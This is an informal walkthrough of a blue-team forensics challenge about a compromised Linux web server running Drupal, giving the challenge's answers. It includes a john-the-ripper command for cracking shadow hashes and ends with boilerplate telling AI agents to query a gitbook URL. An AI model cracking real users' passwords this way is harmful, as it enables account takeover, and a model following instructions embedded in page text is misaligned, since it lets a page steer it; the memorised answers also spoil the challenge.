# Hacked Cyberdefenders * [Details](https://cyberdefenders.org/blueteam-ctf-challenges/71#nav-overview) You have been called to analyze a compromised Linux web server. Figure out how the threat actor gained access, what modifications were applied to the system, and what persistent techniques were utilized. (e.g. backdoors, users, sessions, etc). * [Questions](https://cyberdefenders.org/blueteam-ctf-challenges/71#nav-questions) #### Q1 What is the system timezone? We Can found it the `/etc/timezone` file

**Ans : Europe/Brussels** #### Q2 Who was the last user to log in to the system? We can find it in auth file on: `/var/log/auth.log`

57708Accepted password for mail from 192.168.210.131 port 57708 ssh2

**Ans : mail** #### Q3 What was the source port the user 'mail' connected from? from the priv screen we can found it the answer **"57708"** #### Q4 How long was the last session for user 'mail'? (Minutes only)

We can found the last session started at 13:23:34 and finished at 13:24:11\ then it's just 1 minute \ **Ans : 1** #### Q5 Which server service did the last user use to log in to the system? in the last screen we can found **sshd** **Ans : sshd** #### Q6 What type of authentication attack was performed against the target machine

In the same file We found it's many failled attemped okay it's bruteforce! **Ans : brute-force** **Q7 How many IP addresses are listed in the '/var/log/lastlog' file?**

**Ans : 2** #### Q8 How many users have a login shell? Users Having shell using **/bin/bash**

**Ans : 5** #### Q9 What is the password of the mail user? We can found password of email user in /etc/shadow

``` sudo john --wordlist==/usr/share/rockyou.txt passwd.txt ```

**Ans : forensics** #### Q10 Which user account was created by the attacker? Back to auth.log \ searching for useradd command we can found it

**Ans : php** #### Q11 How many user groups exist on the machine? we can found group in `etc/group` open it to count

**Ans : 58** #### Q12 How many users have sudo access? in the same file searching for sudo

**Ans : 2** #### Q13 What is the home directory of the PHP user? From Q10 When the attacker created the user PHP, its home directory was /usr/php **Ans : /usr/php** #### Q14 What command did the attacker use to gain root privilege? (Answer contains two spaces). We know from the prev Qusetions that the attacker logged in as the user mail , we find the it's home direcotry at: /var/mail let's investigate it's bash history

**Ans : sudo su -** #### #### Q15 Which file did the user 'root' delete? let's check root’s bash history file

**Ans : 37292.c** #### Q16 Recover the deleted file, open it and extract the exploit author name. After some minutes I searching in /tmp After i clicked on it Window defender running ")

After that search for the CVE in exploit-db:

\ **Ans : rebel** #### Q17 What is the content management system (CMS) installed on the machine? it's found in etc

**Ans : drupal** #### Q18 What is the version of the CMS installed on the machine? By helping of chatgpt we can found the version of Drupal Cms in info files found in /var/www/html/

**Ans : 7.26** #### Q19 Which port was listening to receive the attacker's reverse shell? From the question 6 we can found the attacker ip [192.168.210.131](http://192.168.210.131/) we can go to access.log and grep it we found decoded post request

let's going to cyberchief

**Ans : 4444** We fininsed , Thank UUUUUUU for reading ❤🥰 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmedhat.gitbook.io/whoami/writesup/hacked-cyberdefenders.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.